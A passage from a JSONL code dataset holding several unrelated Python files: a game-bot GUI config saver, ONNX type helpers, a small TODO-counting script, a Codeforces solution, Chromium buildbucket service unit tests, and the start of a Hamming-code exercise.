2,\n\t\t\t\"resource\": \"COC/res/resource.png\"\n\t\t}\n\n\t#Saving the config into the file config.json\n\tdef save_config(self):\n\t\tfor i in range(len(self.func)):\n\t\t\tself.config['Functionality'][i] = self.func[i].get()\n\n\t\twith open('COC/config/config.json', 'w',encoding='utf-8') as outfile:\n\t\t\t\tjson.dump(self.config, outfile, ensure_ascii=False, indent=4, sort_keys=True)\n\n\t\tprint(\"配置保存完成\")","sub_path":"COC/COC_GUI.py","file_name":"COC_GUI.py","file_ext":"py","file_size_in_byte":16388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"118043659","text":"# -------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n# --------------------------------------------------------------------------\nimport numpy as np\nfrom ..proto import TensorProto, ValueInfoProto, onnx_proto\nfrom ..common._topology import Variable\nfrom ..common.data_types import (\n BooleanTensorType,\n DoubleTensorType, FloatTensorType,\n Int64Type,\n Int64TensorType, Int32TensorType,\n StringTensorType\n)\n\n\ndef _guess_type_proto(data_type, dims):\n if data_type == onnx_proto.TensorProto.FLOAT:\n return FloatTensorType(dims)\n elif data_type == onnx_proto.TensorProto.DOUBLE:\n return DoubleTensorType(dims)\n elif data_type == onnx_proto.TensorProto.STRING:\n return StringTensorType(dims)\n elif data_type == onnx_proto.TensorProto.INT64:\n return Int64TensorType(dims)\n elif data_type == onnx_proto.TensorProto.INT32:\n return Int32TensorType(dims)\n elif data_type == onnx_proto.TensorProto.BOOL:\n return BooleanTensorType(dims)\n else:\n raise NotImplementedError(\"Unsupported type '{}' \"\n \"data_type={}\".format(\n type(data_type),\n dims))\n\n\ndef _guess_type(given_type):\n \"\"\"\n Returns the proper type of an input.\n \"\"\"\n if isinstance(given_type, np.ndarray):\n if given_type.dtype == np.float32:\n return FloatTensorType(given_type.shape)\n elif given_type.dtype == np.int32:\n return Int32TensorType(given_type.shape)\n elif given_type.dtype == np.int64:\n return Int64TensorType(given_type.shape)\n elif given_type.dtype == np.str or str(given_type.dtype) in (' 1 else \"\"\nprint(f\"user{s} {max_users} completed {max_complete} TODOs\")\n# users 5 and 10 completed 12 TODOs","sub_path":"hh-pars.py","file_name":"hh-pars.py","file_ext":"py","file_size_in_byte":6017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"572050908","text":"from collections import defaultdict\nproblem_in_round, problems = [int(x) for x in input().split()]\ndifficulties = [int(x) for x in input().split()]\nteams = defaultdict(list)\ncounts = defaultdict(int)\nfor i in difficulties:\n counts[i]+=1\n teams[counts[i]].append(i)\n if len(teams[counts[i]]) == problem_in_round:\n print(\"1\", end='')\n else:\n print(\"0\", end='')\n \n","sub_path":"CodeForces/CFR_532_2_B.py","file_name":"CFR_532_2_B.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"332990542","text":"# Copyright 2014 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nimport contextlib\nimport datetime\n\nfrom components import auth\nfrom components import net\nfrom components import utils\nfrom google.appengine.ext import ndb\nfrom testing_utils import testing\nimport mock\n\nfrom test import future\nimport acl\nimport errors\nimport model\nimport notifications\nimport service\nimport swarming\n\n\nclass BuildBucketServiceTest(testing.AppengineTestCase):\n def __init__(self, *args, **kwargs):\n super(BuildBucketServiceTest, self).__init__(*args, **kwargs)\n self.test_build = None\n\n def mock_cannot(self, action):\n def can_async(_bucket, requested_action, _identity=None):\n return future(action != requested_action)\n\n self.mock(acl, 'can_async', can_async)\n\n def setUp(self):\n super(BuildBucketServiceTest, self).setUp()\n self.test_build = model.Build(\n bucket='chromium',\n parameters={\n 'buildername': 'infra',\n 'changes': [{\n 'author': 'nodir@google.com',\n 'message': 'buildbucket: initial commit'\n }]\n }\n )\n\n self.current_identity = auth.Identity('service', 'unittest')\n self.mock(auth, 'get_current_identity', lambda: self.current_identity)\n self.mock(acl, 'can_async', lambda *_: future(True))\n self.now = datetime.datetime(2015, 1, 1)\n self.mock(utils, 'utcnow', lambda: self.now)\n self.mock(swarming, 'is_for_swarming_async', mock.Mock())\n self.mock(swarming, 'create_task_async', mock.Mock())\n swarming.is_for_swarming_async.return_value = ndb.Future()\n swarming.is_for_swarming_async.return_value.set_result(False)\n\n def put_many_builds(self):\n for _ in xrange(100):\n b = model.Build(bucket=self.test_build.bucket)\n b.put()\n\n #################################### ADD #####################################\n\n def test_add(self):\n params = {'buildername': 'linux_rel'}\n build = service.add(\n bucket='chromium',\n parameters=params,\n )\n self.assertIsNotNone(build.key)\n self.assertIsNotNone(build.key.id())\n self.assertEqual(build.bucket, 'chromium')\n self.assertEqual(build.parameters, params)\n self.assertEqual(build.created_by, auth.get_current_identity())\n\n def test_add_with_client_operation_id(self):\n build = service.add(\n bucket='chromium',\n parameters={'buildername': 'linux_rel'},\n client_operation_id='1',\n )\n build2 = service.add(\n bucket='chromium',\n parameters={'buildername': 'linux_rel'},\n client_operation_id='1',\n )\n self.assertIsNotNone(build.key)\n self.assertEqual(build, build2)\n\n def test_add_with_bad_bucket_name(self):\n with self.assertRaises(errors.InvalidInputError):\n service.add(bucket='chromium as')\n with self.assertRaises(errors.InvalidInputError):\n service.add(bucket='')\n\n def test_add_with_leasing(self):\n build = service.add(\n bucket='chromium',\n lease_expiration_date=utils.utcnow() + datetime.timedelta(seconds=10),\n )\n self.assertTrue(build.is_leased)\n self.assertGreater(build.lease_expiration_date, utils.utcnow())\n self.assertIsNotNone(build.lease_key)\n\n def test_add_with_auth_error(self):\n self.mock_cannot(acl.Action.ADD_BUILD)\n with self.assertRaises(auth.AuthorizationError):\n service.add(self.test_build.bucket)\n\n def test_add_with_bad_parameters(self):\n with self.assertRaises(errors.InvalidInputError):\n service.add('bucket', parameters=[])\n\n def test_add_with_swarming_400(self):\n swarming.is_for_swarming_async.return_value = ndb.Future()\n swarming.is_for_swarming_async.return_value.set_result(True)\n swarming.create_task_async.side_effect = net.Error(\n '', status_code=400, response='bad request')\n with self.assertRaises(errors.InvalidInputError):\n service.add(self.test_build.bucket)\n\n def test_add_with_swarming_403(self):\n swarming.is_for_swarming_async.return_value = ndb.Future()\n swarming.is_for_swarming_async.return_value.set_result(True)\n swarming.create_task_async.side_effect = net.AuthError(\n '', status_code=403, response='access denied')\n with self.assertRaises(auth.AuthorizationError):\n service.add(self.test_build.bucket)\n\n ################################### RETRY ####################################\n\n def test_retry(self):\n self.test_build.put()\n build = service.retry(self.test_build.key.id())\n self.assertIsNotNone(build)\n self.assertIsNotNone(build.key)\n self.assertNotEqual(build.key.id(), self.test_build.key.id())\n self.assertEqual(build.bucket, self.test_build.bucket)\n self.assertEqual(build.parameters, self.test_build.parameters)\n self.assertEqual(build.retry_of, self.test_build.key.id())\n\n def test_retry_not_found(self):\n with self.assertRaises(errors.BuildNotFoundError):\n service.retry(2)\n\n #################################### GET #####################################\n\n def test_get(self):\n self.test_build.put()\n build = service.get(self.test_build.key.id())\n self.assertEqual(build, self.test_build)\n\n def test_get_nonexistent_build(self):\n self.assertIsNone(service.get(42))\n\n def test_get_with_auth_error(self):\n self.mock_cannot(acl.Action.VIEW_BUILD)\n self.test_build.put()\n with self.assertRaises(auth.AuthorizationError):\n service.get(self.test_build.key.id())\n\n ################################### CANCEL ###################################\n\n def test_cancel(self):\n self.test_build.put()\n build = service.cancel(self.test_build.key.id())\n self.assertEqual(build.status, model.BuildStatus.COMPLETED)\n self.assertEqual(build.status_changed_time, utils.utcnow())\n self.assertEqual(build.complete_time, utils.utcnow())\n self.assertEqual(build.result, model.BuildResult.CANCELED)\n self.assertEqual(\n build.cancelation_reason, model.CancelationReason.CANCELED_EXPLICITLY)\n\n def test_cancel_is_idempotent(self):\n self.test_build.put()\n service.cancel(self.test_build.key.id())\n service.cancel(self.test_build.key.id())\n\n def test_cancel_started_build(self):\n self.lease()\n self.start()\n service.cancel(self.test_build.key.id())\n\n def test_cancel_nonexistent_build(self):\n with self.assertRaises(errors.BuildNotFoundError):\n service.cancel(1)\n\n def test_cancel_with_auth_error(self):\n self.test_build.put()\n self.mock_cannot(acl.Action.CANCEL_BUILD)\n with self.assertRaises(auth.AuthorizationError):\n service.cancel(self.test_build.key.id())\n\n def test_cancel_completed_build(self):\n self.test_build.status = model.BuildStatus.COMPLETED\n self.test_build.result = model.BuildResult.SUCCESS\n self.test_build.put()\n with self.assertRaises(errors.BuildIsCompletedError):\n service.cancel(self.test_build.key.id())\n\n #################################### SEARCH ##################################\n\n def test_search(self):\n build2 = model.Build(bucket=self.test_build.bucket)\n build2.put()\n\n self.test_build.tags = ['important:true']\n self.test_build.put()\n builds, _ = service.search(\n buckets=[self.test_build.bucket],\n tags=self.test_build.tags,\n )\n self.assertEqual(builds, [self.test_build])\n\n def test_search_without_buckets(self):\n get_available_buckets = mock.Mock()\n self.mock(acl, 'get_available_buckets', get_available_buckets)\n\n self.test_build.put()\n build2 = model.Build(bucket='other bucket')\n build2.put()\n\n get_available_buckets.return_value = [self.test_build.bucket]\n builds, _ = service.search()\n self.assertEqual(builds, [self.test_build])\n\n # All buckets are available.\n get_available_buckets.return_value = None\n builds, _ = service.search()\n self.assertEqual(builds, [self.test_build, build2])\n\n # No buckets are available.\n get_available_buckets.return_value = []\n builds, _ = service.search()\n self.assertEqual(builds, [])\n\n def test_search_many_tags(self):\n self.test_build.tags = ['important:true', 'author:ivan']\n self.test_build.put()\n build2 = model.Build(\n bucket=self.test_build.bucket,\n tags=self.test_build.tags[:1], # only one of two tags.\n )\n build2.put()\n\n # Search by both tags.\n builds, _ = service.search(\n tags=self.test_build.tags,\n buckets=[self.test_build.bucket],\n )\n self.assertEqual(builds, [self.test_build])\n\n def test_search_by_buildset(self):\n self.test_build.tags = ['buildset:x']\n self.test_build.put()\n\n build2 = model.Build(\n bucket='secret.bucket',\n tags=self.test_build.tags, # only one of two tags.\n )\n build2.put()\n\n get_available_buckets = mock.Mock(return_value=[self.test_build.bucket])\n self.mock(acl, 'get_available_buckets', get_available_buckets)\n builds, _ = service.search(tags=['buildset:x'])\n self.assertEqual(builds, [self.test_build])\n\n def test_search_bucket(self):\n self.test_build.put()\n build2 = model.Build(\n bucket='other bucket',\n )\n build2.put()\n\n builds, _ = service.search(buckets=[self.test_build.bucket])\n self.assertEqual(builds, [self.test_build])\n\n def test_search_by_status(self):\n self.test_build.put()\n build2 = model.Build(\n bucket=self.test_build.bucket,\n status=model.BuildStatus.COMPLETED,\n result=model.BuildResult.SUCCESS,\n )\n build2.put()\n\n builds, _ = service.search(\n buckets=[self.test_build.bucket],\n status=model.BuildStatus.SCHEDULED)\n self.assertEqual(builds, [self.test_build])\n\n builds, _ = service.search(\n buckets=[self.test_build.bucket],\n status=model.BuildStatus.COMPLETED,\n result=model.BuildResult.FAILURE)\n self.assertEqual(builds, [])\n\n def test_search_by_created_by(self):\n self.test_build.put()\n build2 = model.Build(\n bucket=self.test_build.bucket,\n created_by=auth.Identity.from_bytes('user:x@chromium.org')\n )\n build2.put()\n\n builds, _ = service.search(\n created_by='x@chromium.org', buckets=[self.test_build.bucket])\n self.assertEqual(builds, [build2])\n\n def test_search_by_retry_of(self):\n self.test_build.put()\n build2 = model.Build(\n bucket=self.test_build.bucket,\n retry_of=42,\n )\n build2.put()\n\n builds, _ = service.search(retry_of=42)\n self.assertEqual(builds, [build2])\n\n def test_search_by_created_by_with_bad_string(self):\n with self.assertRaises(errors.InvalidInputError):\n service.search(created_by='blah')\n\n def test_search_with_paging(self):\n self.put_many_builds()\n\n first_page, next_cursor = service.search(\n buckets=[self.test_build.bucket],\n max_builds=10,\n )\n self.assertEqual(len(first_page), 10)\n self.assertTrue(next_cursor)\n\n second_page, _ = service.search(\n buckets=[self.test_build.bucket],\n max_builds=10,\n start_cursor=next_cursor)\n self.assertEqual(len(second_page), 10)\n # no cover due to a bug in coverage (http://stackoverflow.com/a/35325514)\n self.assertTrue(\n any(new not in first_page for new in second_page)) # pragma: no cover\n\n def test_search_with_bad_tags(self):\n def test_bad_tag(tags):\n with self.assertRaises(errors.InvalidInputError):\n service.search(buckets=['bucket'], tags=tags)\n\n test_bad_tag(['x'])\n test_bad_tag([1])\n test_bad_tag({})\n test_bad_tag(1)\n\n def test_search_with_bad_buckets(self):\n with self.assertRaises(errors.InvalidInputError):\n service.search(buckets={})\n with self.assertRaises(errors.InvalidInputError):\n service.search(buckets=[1])\n\n def test_search_with_non_number_max_builds(self):\n with self.assertRaises(errors.InvalidInputError):\n service.search(buckets=['b'], tags=['a:b'], max_builds='a')\n\n def test_search_with_negative_max_builds(self):\n with self.assertRaises(errors.InvalidInputError):\n service.search(buckets=['b'], tags=['a:b'], max_builds=-2)\n\n #################################### PEEK ####################################\n\n def test_peek(self):\n self.test_build.put()\n builds, _ = service.peek(buckets=[self.test_build.bucket])\n self.assertEqual(builds, [self.test_build])\n\n def test_peek_multi(self):\n self.test_build.key = ndb.Key(model.Build, model.new_build_id())\n self.test_build.put()\n # We test that peek returns builds in decreasing order of the build key. The\n # build key is derived from the inverted current time, so later builds get\n # smaller ids. Only exception: if the time is the same, randomness decides\n # the order. So artificially create an id here to avoid flakiness.\n build2 = model.Build(id=self.test_build.key.id() - 1, bucket='bucket2')\n build2.put()\n builds, _ = service.peek(buckets=[self.test_build.bucket, 'bucket2'])\n self.assertEqual(builds, [self.test_build, build2])\n\n def test_peek_with_paging(self):\n self.put_many_builds()\n first_page, next_cursor = service.peek(\n buckets=[self.test_build.bucket])\n self.assertTrue(first_page)\n self.assertTrue(next_cursor)\n\n second_page, _ = service.peek(\n buckets=[self.test_build.bucket], start_cursor=next_cursor)\n\n self.assertTrue(all(b not in second_page for b in first_page))\n\n def test_peek_with_bad_cursor(self):\n self.put_many_builds()\n with self.assertRaises(errors.InvalidInputError):\n service.peek(buckets=[self.test_build.bucket], start_cursor='abc')\n\n def test_peek_without_buckets(self):\n with self.assertRaises(errors.InvalidInputError):\n service.peek(buckets=[])\n\n def test_peek_with_auth_error(self):\n self.mock_cannot(acl.Action.SEARCH_BUILDS)\n self.test_build.put()\n with self.assertRaises(auth.AuthorizationError):\n service.peek(buckets=[self.test_build.bucket])\n\n def test_peek_does_not_return_leased_builds(self):\n self.test_build.put()\n self.lease()\n builds, _ = service.peek([self.test_build.bucket])\n self.assertFalse(builds)\n\n def test_peek_200_builds(self):\n for _ in xrange(200):\n model.Build(bucket=self.test_build.bucket).put()\n builds, _ = service.peek([self.test_build.bucket], max_builds=200)\n self.assertTrue(len(builds) <= 100)\n\n #################################### LEASE ###################################\n\n def lease(self, lease_expiration_date=None):\n if self.test_build.key is None:\n self.test_build.put()\n success, self.test_build = service.lease(\n self.test_build.key.id(),\n lease_expiration_date=lease_expiration_date,\n )\n return success\n\n def test_lease(self):\n expiration_date = utils.utcnow() + datetime.timedelta(minutes=1)\n self.assertTrue(self.lease(lease_expiration_date=expiration_date))\n self.assertTrue(self.test_build.is_leased)\n self.assertGreater(self.test_build.lease_expiration_date, utils.utcnow())\n self.assertEqual(self.test_build.leasee, self.current_identity)\n\n def test_lease_build_with_auth_error(self):\n self.mock_cannot(acl.Action.LEASE_BUILD)\n build = self.test_build\n build.put()\n with self.assertRaises(auth.AuthorizationError):\n self.lease()\n\n def test_cannot_lease_a_leased_build(self):\n build = self.test_build\n build.put()\n self.assertTrue(self.lease())\n self.assertFalse(self.lease())\n\n def test_cannot_lease_a_nonexistent_build(self):\n with self.assertRaises(errors.BuildNotFoundError):\n service.lease(build_id=42)\n\n def test_cannot_lease_for_whole_day(self):\n with self.assertRaises(errors.InvalidInputError):\n self.lease(\n lease_expiration_date=utils.utcnow() + datetime.timedelta(days=1))\n\n def test_cannot_set_expiration_date_to_past(self):\n with self.assertRaises(errors.InvalidInputError):\n yesterday = utils.utcnow() - datetime.timedelta(days=1)\n self.lease(lease_expiration_date=yesterday)\n\n def test_cannot_lease_with_non_datetime_expiration_date(self):\n with self.assertRaises(errors.InvalidInputError):\n self.lease(lease_expiration_date=1)\n\n def test_leasing_regenerates_lease_key(self):\n orig_lease_key = 42\n self.lease()\n self.assertNotEqual(self.test_build.lease_key, orig_lease_key)\n\n def test_cannot_lease_completed_build(self):\n build = self.test_build\n build.status = model.BuildStatus.COMPLETED\n build.result = model.BuildResult.SUCCESS\n build.put()\n self.assertFalse(self.lease())\n\n ################################### UNELASE ##################################\n\n def test_reset(self):\n self.lease()\n build = service.reset(self.test_build.key.id())\n self.assertEqual(build.status, model.BuildStatus.SCHEDULED)\n self.assertEqual(build.status_changed_time, utils.utcnow())\n self.assertIsNone(build.lease_key)\n self.assertIsNone(build.lease_expiration_date)\n self.assertIsNone(build.leasee)\n self.assertTrue(self.lease())\n\n def test_reset_is_idempotent(self):\n self.lease()\n build_id = self.test_build.key.id()\n service.reset(build_id)\n service.reset(build_id)\n\n def test_reset_completed_build(self):\n self.test_build.status = model.BuildStatus.COMPLETED\n self.test_build.result = model.BuildResult.SUCCESS\n self.test_build.put()\n\n with self.assertRaises(errors.BuildIsCompletedError):\n service.reset(self.test_build.key.id())\n\n def test_cannot_reset_nonexistent_build(self):\n with self.assertRaises(errors.BuildNotFoundError):\n service.reset(123)\n\n def test_reset_with_auth_error(self):\n self.lease()\n self.mock_cannot(acl.Action.RESET_BUILD)\n with self.assertRaises(auth.AuthorizationError):\n service.reset(self.test_build.key.id())\n\n #################################### START ###################################\n\n def test_validate_malformed_url(self):\n with self.assertRaises(errors.InvalidInputError):\n service.validate_url('svn://sdfsf')\n\n def test_validate_relative_url(self):\n with self.assertRaises(errors.InvalidInputError):\n service.validate_url('sdfsf')\n\n def test_validate_nonstring_url(self):\n with self.assertRaises(errors.InvalidInputError):\n service.validate_url(123)\n\n def start(self, url=None, lease_key=None):\n self.test_build = service.start(\n self.test_build.key.id(),\n lease_key or self.test_build.lease_key,\n url=url)\n\n def test_start(self):\n self.lease()\n self.start(url='http://localhost')\n self.assertEqual(self.test_build.status, model.BuildStatus.STARTED)\n self.assertEqual(self.test_build.url, 'http://localhost')\n\n def test_start_started_build(self):\n self.lease()\n build_id = self.test_build.key.id()\n lease_key = self.test_build.lease_key\n url = 'http://localhost/'\n\n service.start(build_id, lease_key, url)\n service.start(build_id, lease_key, url)\n service.start(build_id, lease_key, url + '1')\n\n def test_start_non_leased_build(self):\n self.test_build.put()\n with self.assertRaises(errors.LeaseExpiredError):\n service.start(self.test_build.key.id(), 42)\n\n def test_start_completed_build(self):\n self.test_build.status = model.BuildStatus.COMPLETED\n self.test_build.result = model.BuildResult.SUCCESS\n self.test_build.put()\n with self.assertRaises(errors.BuildIsCompletedError):\n service.start(self.test_build.key.id(), 42)\n\n def test_start_without_lease_key(self):\n with self.assertRaises(errors.InvalidInputError):\n service.start(1, None)\n\n @contextlib.contextmanager\n def callback_test(self):\n self.mock(notifications, 'enqueue_callback_task_if_needed', mock.Mock())\n self.test_build.pubsub_callback = model.PubSubCallback(\n topic='projects/example/topic/buildbucket',\n user_data='hello',\n auth_token='secret',\n )\n self.test_build.put()\n yield\n self.assertTrue(notifications.enqueue_callback_task_if_needed.called)\n\n def test_start_creates_notification_task(self):\n self.lease()\n with self.callback_test():\n self.start()\n\n ################################## HEARTBEAT #################################\n\n def test_heartbeat(self):\n self.lease()\n new_expiration_date = utils.utcnow() + datetime.timedelta(minutes=1)\n build = service.heartbeat(\n self.test_build.key.id(), self.test_build.lease_key,\n lease_expiration_date=new_expiration_date)\n self.assertEqual(build.lease_expiration_date, new_expiration_date)\n\n def test_heartbeat_completed(self):\n self.test_build.status = model.BuildStatus.COMPLETED\n self.test_build.result = model.BuildResult.CANCELED\n self.test_build.cancelation_reason = (\n model.CancelationReason.CANCELED_EXPLICITLY)\n self.test_build.put()\n\n new_expiration_date = utils.utcnow() + datetime.timedelta(minutes=1)\n with self.assertRaises(errors.BuildIsCompletedError):\n service.heartbeat(\n self.test_build.key.id(), 0,\n lease_expiration_date=new_expiration_date)\n\n def test_heartbeat_batch(self):\n self.lease()\n new_expiration_date = utils.utcnow() + datetime.timedelta(minutes=1)\n results = service.heartbeat_batch(\n [\n {\n 'build_id': self.test_build.key.id(),\n 'lease_key': self.test_build.lease_key,\n 'lease_expiration_date': new_expiration_date\n },\n {\n 'build_id': 42,\n 'lease_key': 42,\n 'lease_expiration_date': new_expiration_date,\n },\n ])\n\n self.assertEqual(len(results), 2)\n\n self.test_build = self.test_build.key.get()\n self.assertEqual(\n results[0],\n (self.test_build.key.id(), self.test_build, None))\n\n self.assertIsNone(results[1][1])\n self.assertTrue(isinstance(results[1][2], errors.BuildNotFoundError))\n\n def test_heartbeat_without_expiration_date(self):\n self.lease()\n with self.assertRaises(errors.InvalidInputError):\n service.heartbeat(\n self.test_build.key.id(), self.test_build.lease_key,\n lease_expiration_date=None)\n\n ################################### COMPLETE #################################\n\n def succeed(self, **kwargs):\n self.test_build = service.succeed(\n self.test_build.key.id(), self.test_build.lease_key, **kwargs)\n\n def test_succeed(self):\n self.lease()\n self.start()\n self.succeed()\n self.assertEqual(self.test_build.status, model.BuildStatus.COMPLETED)\n self.assertEqual(self.test_build.status_changed_time, utils.utcnow())\n self.assertEqual(self.test_build.result, model.BuildResult.SUCCESS)\n self.assertIsNotNone(self.test_build.complete_time)\n\n def test_succeed_timed_out_build(self):\n self.test_build.status = model.BuildStatus.COMPLETED\n self.test_build.result = model.BuildResult.CANCELED\n self.test_build.cancelation_reason = model.CancelationReason.TIMEOUT\n self.test_build.put()\n with self.assertRaises(errors.BuildIsCompletedError):\n service.succeed(self.test_build.key.id(), 42)\n\n def test_succeed_is_idempotent(self):\n self.lease()\n self.start()\n build_id = self.test_build.key.id()\n lease_key = self.test_build.lease_key\n service.succeed(build_id, lease_key)\n service.succeed(build_id, lease_key)\n\n def test_succeed_with_new_tags(self):\n self.test_build.tags = ['a:1']\n self.test_build.put()\n self.lease()\n self.start()\n self.succeed(new_tags=['b:2'])\n self.assertEqual(self.test_build.tags, ['a:1', 'b:2'])\n\n def test_fail(self):\n self.lease()\n self.start()\n self.test_build = service.fail(\n self.test_build.key.id(), self.test_build.lease_key)\n self.assertEqual(self.test_build.status, model.BuildStatus.COMPLETED)\n self.assertEqual(self.test_build.status_changed_time, utils.utcnow())\n self.assertEqual(self.test_build.result, model.BuildResult.FAILURE)\n self.assertIsNotNone(self.test_build.complete_time)\n\n def test_fail_with_details(self):\n self.lease()\n self.start()\n result_details = {'transient_failure': True}\n self.test_build = service.fail(\n self.test_build.key.id(), self.test_build.lease_key,\n result_details=result_details)\n self.assertEqual(self.test_build.result_details, result_details)\n\n def test_complete_with_url(self):\n self.lease()\n self.start()\n url = 'http://localhost/1'\n self.succeed(url=url)\n self.assertEqual(self.test_build.url, url)\n\n def test_complete_not_started_build(self):\n self.lease()\n self.succeed()\n\n def test_completion_creates_notification_task(self):\n self.lease()\n self.start()\n with self.callback_test():\n self.succeed()\n\n ########################## RESET EXPIRED BUILDS ##############################\n\n def test_reschedule_expired_builds(self):\n self.test_build.lease_expiration_date = utils.utcnow()\n self.test_build.lease_key = 1\n self.test_build.leasee = self.current_identity\n self.test_build.put()\n\n service.reset_expired_builds()\n build = self.test_build.key.get()\n self.assertEqual(build.status, model.BuildStatus.SCHEDULED)\n self.assertIsNone(build.lease_key)\n\n def test_completed_builds_are_not_reset(self):\n self.test_build.status = model.BuildStatus.COMPLETED\n self.test_build.result = model.BuildResult.SUCCESS\n self.test_build.put()\n service.reset_expired_builds()\n build = self.test_build.key.get()\n self.assertEqual(build.status, model.BuildStatus.COMPLETED)\n\n def test_build_timeout(self):\n self.test_build.create_time = utils.utcnow() - datetime.timedelta(days=365)\n self.test_build.put()\n\n service.reset_expired_builds()\n build = self.test_build.key.get()\n self.assertEqual(build.status, model.BuildStatus.COMPLETED)\n self.assertEqual(build.result, model.BuildResult.CANCELED)\n self.assertEqual(build.cancelation_reason, model.CancelationReason.TIMEOUT)\n self.assertIsNone(build.lease_key)\n\n ########################## RESET EXPIRED BUILDS ##############################\n\n def test_delete_many_scheduled_builds(self):\n self.test_build.put()\n completed_build = model.Build(\n bucket=self.test_build.bucket,\n status=model.BuildStatus.COMPLETED,\n result=model.BuildResult.SUCCESS,\n )\n completed_build.put()\n self.assertIsNotNone(self.test_build.key.get())\n self.assertIsNotNone(completed_build.key.get())\n service._task_delete_many_builds(\n self.test_build.bucket, model.BuildStatus.SCHEDULED)\n self.assertIsNone(self.test_build.key.get())\n self.assertIsNotNone(completed_build.key.get())\n\n def test_delete_many_started_builds(self):\n self.test_build.put()\n\n started_build = model.Build(\n bucket=self.test_build.bucket,\n status=model.BuildStatus.STARTED,\n )\n started_build.put()\n\n completed_build = model.Build(\n bucket=self.test_build.bucket,\n status=model.BuildStatus.COMPLETED,\n result=model.BuildResult.SUCCESS,\n )\n completed_build.put()\n\n service._task_delete_many_builds(\n self.test_build.bucket, model.BuildStatus.STARTED)\n self.assertIsNotNone(self.test_build.key.get())\n self.assertIsNone(started_build.key.get())\n self.assertIsNotNone(completed_build.key.get())\n\n def test_delete_many_builds_with_tags(self):\n self.test_build.tags = ['tag:1']\n self.test_build.put()\n\n service._task_delete_many_builds(\n self.test_build.bucket, model.BuildStatus.SCHEDULED, tags=['tag:0'])\n self.assertIsNotNone(self.test_build.key.get())\n\n service._task_delete_many_builds(\n self.test_build.bucket, model.BuildStatus.SCHEDULED, tags=['tag:1'])\n self.assertIsNone(self.test_build.key.get())\n\n def test_delete_many_builds_created_by(self):\n self.test_build.created_by = auth.Identity('user', 'nodir@google.com')\n self.test_build.put()\n other_build = model.Build(bucket=self.test_build.bucket)\n other_build.put()\n\n service._task_delete_many_builds(\n self.test_build.bucket, model.BuildStatus.SCHEDULED,\n created_by='nodir@google.com')\n self.assertIsNone(self.test_build.key.get())\n self.assertIsNotNone(other_build.key.get())\n\n def test_delete_many_builds_auth_error(self):\n self.mock_cannot(acl.Action.DELETE_SCHEDULED_BUILDS)\n with self.assertRaises(auth.AuthorizationError):\n service.delete_many_builds(\n self.test_build.bucket, model.BuildStatus.SCHEDULED)\n\n def test_delete_many_builds_schedule_task(self):\n service.delete_many_builds(\n self.test_build.bucket, model.BuildStatus.SCHEDULED)\n\n def test_delete_many_completed_builds(self):\n with self.assertRaises(errors.InvalidInputError):\n service.delete_many_builds(\n self.test_build.bucket, model.BuildStatus.COMPLETED)\n\n ########################### LONGEST_PENDING_TIME ############################\n\n def test_longest_pending_time(self):\n builds = [\n model.Build(\n bucket='chromium',\n tags=['builder:x'],\n create_time=self.now - datetime.timedelta(minutes=10),\n ),\n model.Build(\n bucket='chromium',\n tags=['builder:x'],\n create_time=self.now - datetime.timedelta(minutes=20),\n ),\n model.Build(\n bucket='chromium',\n tags=['builder:y'],\n create_time=self.now - datetime.timedelta(minutes=30),\n ),\n ]\n for b in builds:\n b.put()\n actual = service.longest_pending_time('chromium', 'x')\n self.assertEqual(actual, datetime.timedelta(minutes=20))\n\n def test_longest_pending_time_invalid_input(self):\n with self.assertRaises(errors.InvalidInputError):\n service.longest_pending_time('', 'x')\n with self.assertRaises(errors.InvalidInputError):\n service.longest_pending_time('chromium', '')\n\n def test_longest_pending_time_no_builds(self):\n actual = service.longest_pending_time('chromium', 'x')\n self.assertEqual(actual, datetime.timedelta(0))\n\n def test_longest_pending_time_without_permissions(self):\n self.mock_cannot(acl.Action.ACCESS_BUCKET)\n with self.assertRaises(auth.AuthorizationError):\n service.longest_pending_time('chromium', 'x')\n","sub_path":"appengine/cr-buildbucket/test/service_test.py","file_name":"service_test.py","file_ext":"py","file_size_in_byte":29820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"586643444","text":"#To Do:\n #Edit brute force for any value of r *****\n #Fix error printing messages (local search and syndrome) *****\n #BSC *****\n #hammingDEP ***** repetitionDEP\n #hammingSimulation ***** repetitionSimulation\n\nimport math\nimport random\nfrom random import randint\n\ndef Hamming_Distance(v1,v2):\n hd = 0 #set a variable for hamming distance\n if len(v1) == len(v2): #check the vectors are the same length\n for i in range(len(v1)):\n if v1[i] != v2[i]: #check to see if elements are different\n hd+=1 #if the elements are different, incremen hd\n return hd \n print('The Hamming Distance is',hd)\n \n\ndef decimalToVector(i,l):\n number = bin(i)[2:] #convert the number to binary and remove the 'b'\n if l < len(number): #check to see if the number can be made from the number of bits specified\n print('The number of chosen bits is too little for this number.')\n else:\n vector = [] #set up a variable for the vector\n if len(number) < l: #check to see if 0's need to be added\n d = l - len(bin(i)[2:]) #work out how many 0's need to be added\n for i in range(d):\n vector.append('0') #add the correct number of 0's to the vector\n for i in range(len(vector)):\n vector[i] = int(vector[i]) #convert the string to an integer\n for i in range(len(number)):\n vector.append(int(number[i])) #add the original binary number to the end of the 0's\n return vector\n\n\ndef vectorToDecimal(v):\n lst_v = [] #create an empty list for the decimal\n for items in v:\n lst_v.append(str(items)) #add the elements of the vector to the list\n decimal = int((''.join(lst_v)),2) #convert from binary to regular number using base 2\n print('The decimal of this vector is',decimal)\n\n\n\ndef vectorTimesMatrix(v,G):\n i = 0 \n m = 0 \n count = 0 #variable for the number of rows completed\n times = 0 #set up a variable for the addition of the digits\n calc_vector = [] #create a variable for the output\n if len(v) != len(G): #check to see if the matrix and vector have the same length\n print('Error: dimensions do not match')\n else:\n while i <= len(v):\n times += G[i][m] * v[i] #multiply one number from the vector by the first digit of the first row of the matrix \n i+=1 #increment to the next digit in the row\n if i == len(v):\n m+=1 #move to the next row of the matrix\n i=0 #move back to the first digit of the current row\n count+=1 #number of rows completed\n if str(times) not in '0' and str(times) not in 